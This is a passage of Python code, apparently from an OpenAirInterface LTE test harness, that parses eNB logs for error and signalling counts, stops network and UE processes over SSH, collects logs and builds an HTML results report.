rrcReestablishRequest = 0
rrcReestablishComplete = 0
rrcReestablishReject = 0
rlcDiscardBuffer = 0
rachCanceledProcedure = 0
uciStatMsgCount = 0
pdcpFailure = 0
ulschFailure = 0
self.htmleNBFailureMsg = ''
for line in enb_log_file.readlines():
if self.rruOptions != '':
res1 = re.search('max_rxgain (?P<requested_option>[0-9]+)', self.rruOptions)
res2 = re.search('max_rxgain (?P<applied_option>[0-9]+)', str(line))
if res1 is not None and res2 is not None:
requested_option = int(res1.group('requested_option'))
applied_option = int(res2.group('applied_option'))
if requested_option == applied_option:
self.htmleNBFailureMsg += '<span class="glyphicon glyphicon-ok-circle"></span> Command line option(s) correctly applied <span class="glyphicon glyphicon-arrow-right"></span> ' + self.rruOptions + '\n\n'
else:
self.htmleNBFailureMsg += '<span class="glyphicon glyphicon-ban-circle"></span> Command line option(s) NOT applied <span class="glyphicon glyphicon-arrow-right"></span> ' + self.rruOptions + '\n\n'
result = re.search('[Ss]egmentation [Ff]ault', str(line))
if result is not None:
foundSegFault = True
result = re.search('[Cc]ore [dD]ump', str(line))
if result is not None:
foundSegFault = True
result = re.search('[Aa]ssertion', str(line))
if result is not None:
foundAssertion = True
result = re.search('LLL', str(line))
if result is not None:
foundRealTimeIssue = True
if foundAssertion and (msgLine < 3):
msgLine += 1
msgAssertion += str(line)
result = re.search('Generating LTE_RRCConnectionSetup', str(line))
if result is not None:
rrcSetupRequest += 1
result = re.search('LTE_RRCConnectionSetupComplete from UE', str(line))
if result is not None:
rrcSetupComplete += 1
result = re.search('Generate LTE_RRCConnectionRelease', str(line))
if result is not None:
rrcReleaseRequest += 1
result = re.search('Generate LTE_RRCConnectionReconfiguration', str(line))
if result is not None:
rrcReconfigRequest += 1
result = re.search('LTE_RRCConnectionReconfigurationComplete from UE rnti', str(line))
if result is not None:
rrcReconfigComplete += 1
result = re.search('LTE_RRCConnectionReestablishmentRequest', str(line))
if result is not None:
rrcReestablishRequest += 1
result = re.search('LTE_RRCConnectionReestablishmentComplete', str(line))
if result is not None:
rrcReestablishComplete += 1
result = re.search('LTE_RRCConnectionReestablishmentReject', str(line))
if result is not None:
rrcReestablishReject += 1
result = re.search('uci->stat', str(line))
if result is not None:
uciStatMsgCount += 1
result = re.search('PDCP.*Out of Resources.*reason', str(line))
if result is not None:
pdcpFailure += 1
result = re.search('ULSCH in error in round', str(line))
if result is not None:
ulschFailure += 1
result = re.search('BAD all_segments_received', str(line))
if result is not None:
rlcDiscardBuffer += 1
result = re.search('Canceled RA procedure for UE rnti', str(line))
if result is not None:
rachCanceledProcedure += 1
enb_log_file.close()
if uciStatMsgCount > 0:
statMsg = 'eNB showed ' + str(uciStatMsgCount) + ' "uci->stat" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if pdcpFailure > 0:
statMsg = 'eNB showed ' + str(pdcpFailure) + ' "PDCP Out of Resources" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if ulschFailure > 0:
statMsg = 'eNB showed ' + str(ulschFailure) + ' "ULSCH in error in round" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if rrcSetupRequest > 0 or rrcSetupComplete > 0:
rrcMsg = 'eNB requested ' + str(rrcSetupRequest) + ' RRC Connection Setup(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcSetupComplete) + ' were completed'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rrcReleaseRequest > 0:
rrcMsg = 'eNB requested ' + str(rrcReleaseRequest) + ' RRC Connection Release(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rrcReconfigRequest > 0 or rrcReconfigComplete > 0:
rrcMsg = 'eNB requested ' + str(rrcReconfigRequest) + ' RRC Connection Reconfiguration(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcReconfigComplete) + ' were completed'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rrcReestablishRequest > 0 or rrcReestablishComplete > 0 or rrcReestablishReject > 0:
rrcMsg = 'eNB requested ' + str(rrcReestablishRequest) + ' RRC Connection Reestablishment(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcReestablishComplete) + ' were completed'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcReestablishReject) + ' were rejected'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rachCanceledProcedure > 0:
rachMsg = 'eNB cancelled ' + str(rachCanceledProcedure) + ' RA procedure(s)'
logging.debug('\u001B[1;30;43m ' + rachMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rachMsg + '\n'
if foundSegFault:
logging.debug('\u001B[1;37;41m eNB ended with a Segmentation Fault! \u001B[0m')
return ENB_PROCESS_SEG_FAULT
if foundAssertion:
logging.debug('\u001B[1;37;41m eNB ended with an assertion! \u001B[0m')
self.htmleNBFailureMsg += msgAssertion
return ENB_PROCESS_ASSERTION
if foundRealTimeIssue:
logging.debug('\u001B[1;37;41m eNB faced real time issues! \u001B[0m')
self.htmleNBFailureMsg += 'eNB faced real time issues!\n'
#return ENB_PROCESS_REALTIME_ISSUE
if rlcDiscardBuffer > 0:
rlcMsg = 'eNB RLC discarded ' + str(rlcDiscardBuffer) + ' buffer(s)'
logging.debug('\u001B[1;37;41m ' + rlcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rlcMsg + '\n'
return ENB_PROCESS_REALTIME_ISSUE
return 0
def TerminateeNB(self):
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath + '/cmake_targets', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S daemon --name=enb' + str(self.eNB_instance) + '_daemon --stop', '\$', 5)
self.command('rm -f my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S killall --signal SIGINT lte-softmodem || true', '\$', 5)
time.sleep(5)
self.command('stdbuf -o0 ps -aux | grep -v grep | grep lte-softmodem', '\$', 5)
result = re.search('lte-softmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.eNBPassword + ' | sudo -S killall --signal SIGKILL lte-softmodem || true', '\$', 5)
time.sleep(5)
self.close()
# If tracer options is on, stopping tshark on EPC side
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
logging.debug('\u001B[1m Stopping tshark \u001B[0m')
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL tshark', '\$', 5)
time.sleep(1)
pcap_log_file = self.eNBLogFile.replace('.log', '_s1log.pcap')
self.command('echo ' + self.EPCPassword + ' | sudo -S chmod 666 /tmp/' + pcap_log_file, '\$', 5)
self.copyin(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, '/tmp/' + pcap_log_file, '.')
self.copyout(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, pcap_log_file, self.eNBSourceCodePath + '/cmake_targets/.')
self.close()
logging.debug('\u001B[1m Replaying RAW record file\u001B[0m')
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath + '/common/utils/T/tracer/', '\$', 5)
raw_record_file = self.eNBLogFile.replace('.log', '_record.raw')
replay_log_file = self.eNBLogFile.replace('.log', '_replay.log')
extracted_txt_file = self.eNBLogFile.replace('.log', '_extracted_messages.txt')
extracted_log_file = self.eNBLogFile.replace('.log', '_extracted_messages.log')
self.command('./extract_config -i ' + self.eNBSourceCodePath + '/cmake_targets/' + raw_record_file + ' > ' + self.eNBSourceCodePath + '/cmake_targets/' + extracted_txt_file, '\$', 5)
self.command('echo $USER; nohup ./replay -i ' + self.eNBSourceCodePath + '/cmake_targets/' + raw_record_file + ' > ' + self.eNBSourceCodePath + '/cmake_targets/' + replay_log_file + ' 2>&1 &', self.eNBUserName, 5)
self.command('./textlog -d ' + self.eNBSourceCodePath + '/cmake_targets/' + extracted_txt_file + ' -no-gui -ON -full > ' + self.eNBSourceCodePath + '/cmake_targets/' + extracted_log_file, '\$', 5)
self.close()
self.copyin(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, self.eNBSourceCodePath + '/cmake_targets/' + extracted_log_file, '.')
logging.debug('\u001B[1m Analyzing eNB replay logfile \u001B[0m')
logStatus = self.AnalyzeLogFile_eNB(extracted_log_file)
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.eNBLogFile = ''
else:
result = re.search('enb_', str(self.eNBLogFile))
if result is not None:
copyin_res = self.copyin(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, self.eNBSourceCodePath + '/cmake_targets/' + self.eNBLogFile, '.')
if (copyin_res == -1):
logging.debug('\u001B[1;37;41m Could not copy eNB logfile to analyze it! \u001B[0m')
self.htmleNBFailureMsg = 'Could not copy eNB logfile to analyze it!'
self.CreateHtmlTestRow('N/A', 'KO', ENB_PROCESS_NOLOGFILE_TO_ANALYZE)
self.eNBLogFile = ''
return
logging.debug('\u001B[1m Analyzing eNB logfile \u001B[0m')
logStatus = self.AnalyzeLogFile_eNB(self.eNBLogFile)
if (logStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', logStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
else:
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.eNBLogFile = ''
else:
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateHSS(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT run_hss oai_hss || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep -v grep | grep hss', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL run_hss oai_hss || true', '\$', 5)
else:
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f ./kill_hss.sh', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S daemon --name=simulated_hss --stop', '\$', 5)
time.sleep(1)
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL hss_sim', '\$', 5)
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateMME(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT run_mme mme || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep -v grep | grep mme', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL run_mme mme || true', '\$', 5)
else:
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./stop_mme', '\$', 5)
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateSPGW(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT run_spgw spgw || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep -v grep | grep spgw', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL run_spgw spgw || true', '\$', 5)
else:
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./stop_xGw', '\$', 5)
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateUE_common(self, device_id):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Detach Completed\u001B[0m')
self.command('stdbuf -o0 adb -s ' + device_id + ' shell ps | grep --color=never iperf | grep -v grep', '\$', 5)
result = re.search('shell +(?P<pid>\d+)', str(self.ssh.before))
if result is not None:
pid_iperf = result.group('pid')
self.command('stdbuf -o0 adb -s ' + device_id + ' shell kill -KILL ' + pid_iperf, '\$', 5)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def TerminateUE(self):
terminate_ue_flag = True
self.GetAllUEDevices(terminate_ue_flag)
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target= SSH.TerminateUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def AutoTerminateUEandeNB(self):
self.testCase_id = 'AUTO-KILL-UE'
self.desc = 'Automatic Termination of UE'
self.ShowTestID()
self.TerminateUE()
self.testCase_id = 'AUTO-KILL-eNB'
self.desc = 'Automatic Termination of eNB'
self.ShowTestID()
self.eNB_instance = '0'
self.TerminateeNB()
def IdleSleep(self):
time.sleep(self.idle_sleep_time)
self.CreateHtmlTestRow(str(self.idle_sleep_time) + ' sec', 'OK', ALL_PROCESSES_OK)
def LogCollectBuild(self):
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath, '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('rm -f build.log.zip', '\$', 5)
self.command('zip build.log.zip build_log_*/*', '\$', 60)
self.command('echo ' + self.eNBPassword + ' | sudo -S rm -rf build_log_*', '\$', 5)
self.close()
def LogCollecteNB(self):
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath, '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S rm -f enb.log.zip', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S zip enb.log.zip enb*.log core* enb_*record.raw enb_*.pcap enb_*txt', '\$', 60)
self.command('echo ' + self.eNBPassword + ' | sudo -S rm enb*.log core* enb_*record.raw enb_*.pcap enb_*txt', '\$', 5)
self.close()
def LogCollectPing(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f ping.log.zip', '\$', 5)
self.command('zip ping.log.zip ping*.log', '\$', 60)
self.command('rm ping*.log', '\$', 5)
self.close()
def LogCollectIperf(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f iperf.log.zip', '\$', 5)
self.command('zip iperf.log.zip iperf*.log', '\$', 60)
self.command('rm iperf*.log', '\$', 5)
self.close()
def LogCollectHSS(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f hss.log.zip', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('zip hss.log.zip hss*.log', '\$', 60)
self.command('rm hss*.log', '\$', 5)
else:
self.command('cp /opt/hss_sim0609/hss.log .', '\$', 60)
self.command('zip hss.log.zip hss.log', '\$', 60)
self.close()
def LogCollectMME(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f mme.log.zip', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('zip mme.log.zip mme*.log', '\$', 60)
self.command('rm mme*.log', '\$', 5)
else:
self.command('cp /opt/ltebox/var/log/*Log.0 .', '\$', 5)
self.command('zip mme.log.zip mmeLog.0 s1apcLog.0 s1apsLog.0 s11cLog.0 libLog.0 s1apCodecLog.0', '\$', 60)
self.close()
def LogCollectSPGW(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f spgw.log.zip', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('zip spgw.log.zip spgw*.log', '\$', 60)
self.command('rm spgw*.log', '\$', 5)
else:
self.command('cp /opt/ltebox/var/log/xGwLog.0 .', '\$', 5)
self.command('zip spgw.log.zip xGwLog.0', '\$', 60)
self.close()
def RetrieveSystemVersion(self):
if self.eNBIPAddress == 'none':
self.eNBOsVersion = 'Ubuntu 16.04.5 LTS'
self.eNBKernelVersion = '4.15.0-45-generic'
self.eNBUhdVersion = '3.13.0.1-0'
self.eNBUsrpBoard = 'B210'
self.eNBCpuNb = '4'
self.eNBCpuModel = 'Intel(R) Core(TM) i5-6200U'
self.eNBCpuMHz = '2399.996 MHz'
return
if self.eNBIPAddress == '' or self.eNBUserName == '' or self.eNBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('lsb_release -a', '\$', 5)
result = re.search('Description:\\\\t(?P<os_type>[a-zA-Z0-9\-\_\.\ ]+)', str(self.ssh.before))
if result is not None:
self.eNBOsVersion = result.group('os_type')
logging.debug('OS is: ' + self.eNBOsVersion)
self.command('uname -r', '\$', 5)
result = re.search('uname -r\\\\r\\\\n(?P<kernel_version>[a-zA-Z0-9\-\_\.]+)', str(self.ssh.before))
if result is not None:
self.eNBKernelVersion = result.group('kernel_version')
logging.debug('Kernel Version is: ' + self.eNBKernelVersion)
self.command('dpkg --list | egrep --color=never libuhd003', '\$', 5)
result = re.search('libuhd003:amd64 *(?P<uhd_version>[0-9\.]+)', str(self.ssh.before))
if result is not None:
self.eNBUhdVersion = result.group('uhd_version')
logging.debug('UHD Version is: ' + self.eNBUhdVersion)
self.command('echo ' + self.eNBPassword + ' | sudo -S uhd_find_devices', '\$', 5)
result = re.search('product: (?P<usrp_board>[0-9A-Za-z]+)\\\\r\\\\n', str(self.ssh.before))
if result is not None:
self.eNBUsrpBoard = result.group('usrp_board')
logging.debug('USRP Board is: ' + self.eNBUsrpBoard)
self.command('lscpu', '\$', 5)
result = re.search('CPU\(s\): *(?P<nb_cpus>[0-9]+).*Model name: *(?P<model>[a-zA-Z0-9\-\_\.\ \(\)]+).*CPU MHz: *(?P<cpu_mhz>[0-9\.]+)', str(self.ssh.before))
if result is not None:
self.eNBCpuNb = result.group('nb_cpus')
logging.debug('nb_cpus: ' + self.eNBCpuNb)
self.eNBCpuModel = result.group('model')
logging.debug('model: ' + self.eNBCpuModel)
self.eNBCpuMHz = result.group('cpu_mhz') + ' MHz'
logging.debug('cpu_mhz: ' + self.eNBCpuMHz)
self.close()
#-----------------------------------------------------------
# HTML Reporting....
#-----------------------------------------------------------
def CreateHtmlHeader(self):
if (not self.htmlHeaderCreated):
self.htmlFile = open('test_results.html', 'w')
self.htmlFile.write('<!DOCTYPE html>\n')
self.htmlFile.write('<html class="no-js" lang="en-US">\n')
self.htmlFile.write('<head>\n')
self.htmlFile.write(' <meta name="viewport" content="width=device-width, initial-scale=1">\n')
self.htmlFile.write(' <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">\n')
self.htmlFile.write(' <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>\n')
self.htmlFile.write(' <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>\n')
self.htmlFile.write(' <title>Test Results for TEMPLATE_JOB_NAME job build #TEMPLATE_BUILD_ID</title>\n')
self.htmlFile.write('</head>\n')
self.htmlFile.write('<body><div class="container">\n')
self.htmlFile.write(' <br>\n')
self.htmlFile.write(' <table style="border-collapse: collapse; border: none;">\n')
self.htmlFile.write(' <tr style="border-collapse: collapse; border: none;">\n')
self.htmlFile.write(' <td style="border-collapse: collapse; border: none;">\n')
self.htmlFile.write(' <a href="http://www.openairinterface.org/">\n')
self.htmlFile.write(' <img src="http://www.openairinterface.org/wp-content/uploads/2016/03/cropped-oai_final_logo2.png" alt="" border="none" height=50 width=150>\n')
self.htmlFile.write(' </img>\n')
self.htmlFile.write(' </a>\n')
self.htmlFile.write(' </td>\n')
self.htmlFile.write(' <td style="border-collapse: collapse; border: none; vertical-align: center;">\n')
self.htmlFile.write(' <b><font size = "6">Job Summary -- Job: TEMPLATE_JOB_NAME -- Build-ID: TEMPLATE_BUILD_ID</font></b>\n')
self.htmlFile.write(' </td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
self.htmlFile.write(' <br>\n')
self.htmlFile.write(' <div class="alert alert-info"><strong> <span class="glyphicon glyphicon-dashboard"></span> TEMPLATE_STAGE_NAME</strong></div>\n')
self.htmlFile.write(' <table border = "1">\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-time"></span> Build Start Time (UTC) </td>\n')
self.htmlFile.write(' <td>TEMPLATE_BUILD_TIME</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-cloud-upload"></span> GIT Repository </td>\n')
self.htmlFile.write(' <td><a href="' + self.eNBRepository + '">' + self.eNBRepository + '</a></td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-wrench"></span> Job Trigger </td>\n')
if (self.eNB_AllowMerge):
self.htmlFile.write(' <td>Merge-Request</td>\n')
else:
self.htmlFile.write(' <td>Push to Branch</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
if (self.eNB_AllowMerge):
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-log-out"></span> Source Branch </td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-tree-deciduous"></span> Branch</td>\n')
self.htmlFile.write(' <td>' + self.eNBBranch + '</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
if (self.eNB_AllowMerge):
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-tag"></span> Source Commit ID </td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-tag"></span> Commit ID </td>\n')
self.htmlFile.write(' <td>' + self.eNBCommitID + '</td>\n')
self.htmlFile.write(' </tr>\n')
if self.eNB_AllowMerge != '':
commit_message = subprocess.check_output("git log -n1 --pretty=format:\"%s\" " + self.eNBCommitID, shell=True, universal_newlines=True)
commit_message = commit_message.strip()
self.htmlFile.write(' <tr>\n')
if (self.eNB_AllowMerge):
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-comment"></span> Source Commit Message </td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-comment"></span> Commit Message </td>\n')
self.htmlFile.write(' <td>' + commit_message + '</td>\n')
self.htmlFile.write(' </tr>\n')
if (self.eNB_AllowMerge):
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-log-in"></span> Target Branch </td>\n')
if (self.eNBTargetBranch == ''):
self.htmlFile.write(' <td>develop</td>\n')
else:
self.htmlFile.write(' <td>' + self.eNBTargetBranch + '</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
terminate_ue_flag = True
if (self.ADBIPAddress != 'none'):
self.GetAllUEDevices(terminate_ue_flag)
self.GetAllCatMDevices(terminate_ue_flag)
else:
self.UEDevices.append('doughq9rehg')
self.UEDevices.append('dnsgiuahgia')
self.UEDevices.append('uehgieng9')
self.htmlUEConnected = len(self.UEDevices)
self.htmlFile.write(' <h2><span class="glyphicon glyphicon-phone"></span> <span class="glyphicon glyphicon-menu-right"></span> ' + str(len(self.UEDevices)) + ' UE(s) is(are) connected to ADB bench server</h2>\n')
self.htmlFile.write(' <h2><span class="glyphicon glyphicon-phone"></span> <span class="glyphicon glyphicon-menu-right"></span> ' + str(len(self.CatMDevices)) + ' CAT-M UE(s) is(are) connected to bench server</h2>\n')
self.htmlFile.write(' <br>\n')
self.htmlFile.write(' <ul class="nav nav-pills">\n')
count = 0
while (count < self.nbTestXMLfiles):
pillMsg = ' <li><a data-toggle="pill" href="#'
pillMsg += self.htmlTabRefs[count]
pillMsg += '">'
pillMsg += self.htmlTabNames[count]
pillMsg += ' <span class="glyphicon glyphicon-'
pillMsg += self.htmlTabIcons[count]
pillMsg += '"></span></a></li>\n'
self.htmlFile.write(pillMsg)
count += 1
self.htmlFile.write(' </ul>\n')
self.htmlFile.write(' <div class="tab-content">\n')
self.htmlFile.close()
def CreateHtmlTabHeader(self):
if (not self.htmlHeaderCreated):
if (not os.path.isfile('test_results.html')):
self.CreateHtmlHeader()
self.htmlFile = open('test_results.html', 'a')
if (self.nbTestXMLfiles == 1):
self.htmlFile.write(' <div id="' + self.htmlTabRefs[0] + '" class="tab-pane fade">\n')
self.htmlFile.write(' <h3>Test Summary for <span class="glyphicon glyphicon-file"></span> ' + self.testXMLfiles[0] + '</h3>\n')
else:
self.htmlFile.write(' <div id="build-tab" class="tab-pane fade">\n')
self.htmlFile.write(' <table class="table" border = "1">\n')
self.htmlFile.write(' <tr bgcolor = "#33CCFF" >\n')
self.htmlFile.write(' <th>Test Id</th>\n')
self.htmlFile.write(' <th>Test Desc</th>\n')
self.htmlFile.write(' <th>Test Options</th>\n')
self.htmlFile.write(' <th>Test Status</th>\n')
if (self.htmlUEConnected == -1):
terminate_ue_flag = True
if (self.ADBIPAddress != 'none'):
self.GetAllUEDevices(terminate_ue_flag)
self.GetAllCatMDevices(terminate_ue_flag)
else:
self.UEDevices.append('doughq9rehg')
self.UEDevices.append('dnsgiuahgia')
self.UEDevices.append('uehgieng9')
self.htmlUEConnected = len(self.UEDevices)
i = 0
while (i < self.htmlUEConnected):
self.htmlFile.write(' <th>UE' + str(i) + ' Status</th>\n')
i += 1
self.htmlFile.write(' </tr>\n')
self.htmlHeaderCreated = True
def CreateHtmlTabFooter(self, passStatus):
if ((not self.htmlFooterCreated) and (self.htmlHeaderCreated)):
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <th bgcolor = "#33CCFF" colspan=2>Final Tab Status</th>\n')
if passStatus:
self.htmlFile.write(' <th bgcolor = "green" colspan=' + str(2 + self.htmlUEConnected) + '><font color="white">PASS <span class="glyphicon glyphicon-ok"></span> </font></th>\n')
else:
self.htmlFile.write(' <th bgcolor = "red" colspan=' + str(2 + self.htmlUEConnected) + '><font color="white">FAIL <span class="glyphicon glyphicon-remove"></span> </font></th>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
self.htmlFile.write(' </div>\n')
self.htmlFooterCreated = False
def CreateHtmlFooter(self, passStatus):
if (os.path.isfile('test_results.html')):
self.RetrieveSystemVersion()
self.htmlFile = open('test_results.html', 'a')
self.htmlFile.write('</div>\n')
self.htmlFile.write(' <p></p>\n')
self.htmlFile.write(' <table class="table table-condensed">\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <th colspan=8>eNB Server Characteristics</th>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td>OS Version</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.eNBOsVersion + '</span></td>\n')
self.htmlFile.write(' <td>Kernel Version</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.eNBKernelVersion + '</span></td>\n')
self.htmlFile.write(' <td>UHD Version</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.eNBUhdVersion + '</span></td>\n')
self.htmlFile.write(' <td>USRP Board</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.eNBUsrpBoard + '</span></td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td>Nb CPUs</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.eNBCpuNb + '</span></td>\n')
self.htmlFile.write(' <td>CPU Model Name</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.eNBCpuModel + '</span></td>\n')
self.htmlFile.write(' <td>CPU Frequency</td>\n')
